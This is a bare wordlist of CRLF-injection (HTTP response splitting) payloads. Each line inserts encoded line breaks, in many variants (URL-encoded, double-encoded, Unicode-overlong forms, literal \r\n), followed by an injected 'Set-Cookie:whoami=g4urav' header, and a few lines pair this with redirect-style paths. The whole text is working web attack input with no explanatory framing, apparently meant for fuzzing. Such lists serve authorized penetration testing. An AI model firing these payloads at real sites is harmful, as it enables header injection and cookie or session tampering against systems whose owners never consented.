/%0D%0ASet-Cookie:whoami=g4urav
%0ASet-Cookie:whoami=g4urav
%0A%20Set-Cookie:whoami=g4urav
%20%0ASet-Cookie:whoami=g4urav
%23%OASet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8D%0ASet-Cookie:whoami=g4urav
%3F%0ASet-Cookie:whoami=g4urav
crlf%0ASet-Cookie:whoami=g4urav
crlf%0A%20Set-Cookie:whoami=g4urav
crlf%20%0ASet-Cookie:whoami=g4urav
crlf%23%OASet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8D%0ASet-Cookie:whoami=g4urav
crlf%3F%0ASet-Cookie:whoami=g4urav
%0DSet-Cookie:whoami=g4urav
%0D%20Set-Cookie:whoami=g4urav
%20%0DSet-Cookie:whoami=g4urav
%23%0DSet-Cookie:whoami=g4urav
%23%0ASet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8D%0DSet-Cookie:whoami=g4urav
%3F%0DSet-Cookie:whoami=g4urav
crlf%0DSet-Cookie:whoami=g4urav
crlf%0D%20Set-Cookie:whoami=g4urav
crlf%20%0DSet-Cookie:whoami=g4urav
crlf%23%0DSet-Cookie:whoami=g4urav
crlf%23%0ASet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8D%0DSet-Cookie:whoami=g4urav
crlf%3F%0DSet-Cookie:whoami=g4urav
%0D%0ASet-Cookie:whoami=g4urav
%0D%0A%20Set-Cookie:whoami=g4urav
%20%0D%0ASet-Cookie:whoami=g4urav
%23%0D%0ASet-Cookie:whoami=g4urav
\r\nSet-Cookie:whoami=g4urav
 \r\n Set-Cookie:whoami=g4urav
\r\n Set-Cookie:whoami=g4urav
%5cr%5cnSet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:whoami=g4urav
%3F%0D%0ASet-Cookie:whoami=g4urav
crlf%0D%0ASet-Cookie:whoami=g4urav
crlf%0D%0A%20Set-Cookie:whoami=g4urav
crlf%20%0D%0ASet-Cookie:whoami=g4urav
crlf%23%0D%0ASet-Cookie:whoami=g4urav
crlf\r\nSet-Cookie:whoami=g4urav
crlf%5cr%5cnSet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8DSet-Cookie:whoami=g4urav
crlf%E5%98%8A%E5%98%8D%0D%0ASet-Cookie:whoami=g4urav
crlf%3F%0D%0ASet-Cookie:whoami=g4urav
%0D%0A%09Set-Cookie:whoami=g4urav
crlf%0D%0A%09Set-Cookie:whoami=g4urav
%250ASet-Cookie:whoami=g4urav
%25250ASet-Cookie:whoami=g4urav
%%0A0ASet-Cookie:whoami=g4urav
%25%30ASet-Cookie:whoami=g4urav
%25%30%61Set-Cookie:whoami=g4urav
%u000ASet-Cookie:whoami=g4urav
//www.google.com/%2F%2E%2E%0D%0ASet-Cookie:whoami=g4urav
/www.google.com/%2E%2E%2F%0D%0ASet-Cookie:whoami=g4urav
/google.com/%2F..%0D%0ASet-Cookie:whoami=g4urav
